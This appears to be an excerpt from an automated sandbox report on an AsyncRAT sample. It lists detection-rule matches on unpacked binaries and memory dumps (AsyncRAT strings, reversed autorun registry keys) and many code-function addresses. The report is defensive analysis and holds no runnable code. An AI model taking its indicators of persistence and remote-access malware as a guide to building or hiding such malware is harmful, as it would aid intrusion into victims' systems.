Source: 33.2.Taskshell.exe.319ecd8.0.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.raw.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 10.2.xcsUjVN.exe.2d3ac2c.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 10.2.xcsUjVN.exe.2d3ac2c.0.raw.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 10.2.xcsUjVN.exe.2d3ac2c.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 21.2.Taskshell.exe.2b28e9c.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 21.2.Taskshell.exe.2b28e9c.1.raw.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 21.2.Taskshell.exe.2b28e9c.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 37.2.Taskshell.exe.304befc.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 37.2.Taskshell.exe.304befc.0.raw.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 37.2.Taskshell.exe.304befc.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 33.2.Taskshell.exe.319ecd8.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 33.2.Taskshell.exe.319ecd8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 33.2.Taskshell.exe.319ecd8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.raw.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000009.00000002.1793564770.0000000003021000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000021.00000002.2026862188.000000000319D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000021.00000002.2026862188.000000000319D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000000.00000002.1760909850.0000000003507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000000.00000002.1760909850.0000000003507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000009.00000002.1790797223.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000000A.00000002.1858382198.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 0000000A.00000002.1858382198.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000025.00000002.2090225147.000000000304A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000025.00000002.2090225147.000000000304A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000014.00000002.2954261509.0000000003491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000015.00000002.1918167976.0000000002A8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000015.00000002.1918167976.0000000002A8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: PXUVmodpCYqRIPQ.exe PID: 6792, type: MEMORYSTR Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: PXUVmodpCYqRIPQ.exe PID: 7204, type: MEMORYSTR Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: xcsUjVN.exe PID: 7268, type: MEMORYSTR Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: xcsUjVN.exe PID: 7728, type: MEMORYSTR Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: Taskshell.exe PID: 7756, type: MEMORYSTR Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: Taskshell.exe PID: 3852, type: MEMORYSTR Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: Taskshell.exe PID: 7576, type: MEMORYSTR Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_0318B770 0_2_0318B770
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_03180518 0_2_03180518
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_031859D8 0_2_031859D8
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_031859C8 0_2_031859C8
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_03183890 0_2_03183890
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_03183880 0_2_03183880
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_03184F68 0_2_03184F68
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_0318050A 0_2_0318050A
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_0318341D 0_2_0318341D
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_03183458 0_2_03183458
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_03183CC8 0_2_03183CC8
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_031CD304 0_2_031CD304
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05ECA7B0 0_2_05ECA7B0
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05ECC128 0_2_05ECC128
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05ECBA48 0_2_05ECBA48
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05ECC5E8 0_2_05ECC5E8
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05ECC5F8 0_2_05ECC5F8
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05EC4D6B 0_2_05EC4D6B
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05EC4D70 0_2_05EC4D70
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05EC7488 0_2_05EC7488
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05ECAC88 0_2_05ECAC88
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05ECAC98 0_2_05ECAC98
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05EC3460 0_2_05EC3460
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05EC7478 0_2_05EC7478
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05EC5C48 0_2_05EC5C48
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05EC2C40 0_2_05EC2C40
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05EC3451 0_2_05EC3451
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05EC5C3B 0_2_05EC5C3B
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05ECA754 0_2_05ECA754
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05ECA730 0_2_05ECA730
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05ECAEE3 0_2_05ECAEE3
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05ECAEF0 0_2_05ECAEF0
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05EC6EA8 0_2_05EC6EA8
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05EC6EB8 0_2_05EC6EB8
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05EC3E60 0_2_05EC3E60
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05EC3E5E 0_2_05EC3E5E
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05EC2160 0_2_05EC2160
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05EC2150 0_2_05EC2150
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05ECC123 0_2_05ECC123
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05EC7028 0_2_05EC7028
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05EC701B 0_2_05EC701B
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05EC2BAC 0_2_05EC2BAC
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05EC72A8 0_2_05EC72A8
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05EC72B8 0_2_05EC72B8
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05EC6A88 0_2_05EC6A88
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05EC6A98 0_2_05EC6A98
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05ECAA48 0_2_05ECAA48
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05ECAA43 0_2_05ECAA43
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 0_2_05ECBA3F 0_2_05ECBA3F
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_00F6D304 10_2_00F6D304
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_0716A7B0 10_2_0716A7B0
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_0716C128 10_2_0716C128
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_07163E60 10_2_07163E60
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_07164D70 10_2_07164D70
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_07162C40 10_2_07162C40
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_0716BA48 10_2_0716BA48
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_0716A792 10_2_0716A792
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_07167652 10_2_07167652
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_07167658 10_2_07167658
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_0716C5F8 10_2_0716C5F8
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_0716C5E8 10_2_0716C5E8
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_07163451 10_2_07163451
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_07167479 10_2_07167479
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_07163460 10_2_07163460
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_07167488 10_2_07167488
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_0716C122 10_2_0716C122
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_07162150 10_2_07162150
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_07162160 10_2_07162160
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_071671F8 10_2_071671F8
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_071671E9 10_2_071671E9
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_07167078 10_2_07167078
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_07167088 10_2_07167088
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_07165E18 10_2_07165E18
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_07165E08 10_2_07165E08
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_07163E5E 10_2_07163E5E
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_0716AEF0 10_2_0716AEF0
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_0716AEE2 10_2_0716AEE2
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_07164D4F 10_2_07164D4F
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_07166C62 10_2_07166C62
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_07166C68 10_2_07166C68
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_07164C91 10_2_07164C91
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_0716AC98 10_2_0716AC98
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_0716AC88 10_2_0716AC88
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_07162BB1 10_2_07162BB1
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_0716BA3F 10_2_0716BA3F
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_0716AA38 10_2_0716AA38
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_0716BA38 10_2_0716BA38
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_0716AA48 10_2_0716AA48
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_0B19A808 10_2_0B19A808
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_0B190518 10_2_0B190518
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_0B1959D8 10_2_0B1959D8
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_0B193890 10_2_0B193890
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_0B193880 10_2_0B193880
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_0B194F68 10_2_0B194F68
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_0B190508 10_2_0B190508
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_0B193425 10_2_0B193425
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_0B193458 10_2_0B193458
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 10_2_0B193CC8 10_2_0B193CC8
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 20_2_01C371C8 20_2_01C371C8
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 20_2_01C368F8 20_2_01C368F8
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 20_2_01C365B0 20_2_01C365B0
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 20_2_01C376C8 20_2_01C376C8
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 20_2_01C3AF60 20_2_01C3AF60
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_00C2D304 21_2_00C2D304
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_026F0518 21_2_026F0518
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_026FAAE8 21_2_026FAAE8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_026F3458 21_2_026F3458
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_026F3425 21_2_026F3425
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_026F050B 21_2_026F050B
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_026F3880 21_2_026F3880
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_026F3890 21_2_026F3890
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_026F59C8 21_2_026F59C8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_026F59D8 21_2_026F59D8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_026F4F68 21_2_026F4F68
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_026F3CC8 21_2_026F3CC8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_0866C128 21_2_0866C128
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_0866BA48 21_2_0866BA48
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_08662C40 21_2_08662C40
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_08664D70 21_2_08664D70
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_08663E60 21_2_08663E60
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_0866A7B0 21_2_0866A7B0
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_08667078 21_2_08667078
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_08667088 21_2_08667088
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_08662160 21_2_08662160
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_08662150 21_2_08662150
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_0866C123 21_2_0866C123
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_0866C119 21_2_0866C119
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_086671E9 21_2_086671E9
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_086671F8 21_2_086671F8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_0866AA48 21_2_0866AA48
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_0866BA3A 21_2_0866BA3A
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_0866AA38 21_2_0866AA38
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_08662BA8 21_2_08662BA8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_08666C62 21_2_08666C62
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_08663460 21_2_08663460
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_08666C68 21_2_08666C68
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_08664C70 21_2_08664C70
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_08667479 21_2_08667479
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_08663451 21_2_08663451
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_08667488 21_2_08667488
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_0866AC88 21_2_0866AC88
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_0866AC98 21_2_0866AC98
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_0866C5E8 21_2_0866C5E8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_0866C5F8 21_2_0866C5F8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_08667652 21_2_08667652
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_08663E5F 21_2_08663E5F
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_08667658 21_2_08667658
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_08665E08 21_2_08665E08
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_08665E18 21_2_08665E18
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_0866AEE2 21_2_0866AEE2
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_0866AEF0 21_2_0866AEF0
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_0866A754 21_2_0866A754
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 21_2_0866A730 21_2_0866A730
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_00E3D304 22_2_00E3D304
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704A7B0 22_2_0704A7B0
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704C128 22_2_0704C128
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07043E60 22_2_07043E60
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07044D70 22_2_07044D70
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07042C40 22_2_07042C40
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704BA48 22_2_0704BA48
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704A792 22_2_0704A792
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07047652 22_2_07047652
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07047658 22_2_07047658
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704C5E8 22_2_0704C5E8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704C5F8 22_2_0704C5F8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07043451 22_2_07043451
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07043460 22_2_07043460
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07047479 22_2_07047479
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07047488 22_2_07047488
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704C119 22_2_0704C119
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704C123 22_2_0704C123
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07042150 22_2_07042150
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07042160 22_2_07042160
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_070471E9 22_2_070471E9
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_070471F8 22_2_070471F8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07047078 22_2_07047078
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07047088 22_2_07047088
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07045E08 22_2_07045E08
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07045E18 22_2_07045E18
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07043E5F 22_2_07043E5F
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704AEE2 22_2_0704AEE2
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704AEF0 22_2_0704AEF0
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07044D4F 22_2_07044D4F
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07046C62 22_2_07046C62
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07046C68 22_2_07046C68
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704AC88 22_2_0704AC88
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07044C91 22_2_07044C91
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704AC98 22_2_0704AC98
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_07042BB1 22_2_07042BB1
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704BA3F 22_2_0704BA3F
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704AA38 22_2_0704AA38
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704BA38 22_2_0704BA38
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0704AA48 22_2_0704AA48
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0B070518 22_2_0B070518
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0B077D48 22_2_0B077D48
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0B0759D8 22_2_0B0759D8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0B073880 22_2_0B073880
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0B073890 22_2_0B073890
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0B074F68 22_2_0B074F68
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0B07050A 22_2_0B07050A
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0B073425 22_2_0B073425
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0B073458 22_2_0B073458
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 22_2_0B073CC8 22_2_0B073CC8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_0145A808 33_2_0145A808
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_01450518 33_2_01450518
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_014559D8 33_2_014559D8
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_01453880 33_2_01453880
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_01453890 33_2_01453890
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_01450508 33_2_01450508
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_01453458 33_2_01453458
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_01453425 33_2_01453425
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 33_2_01453CC8 33_2_01453CC8
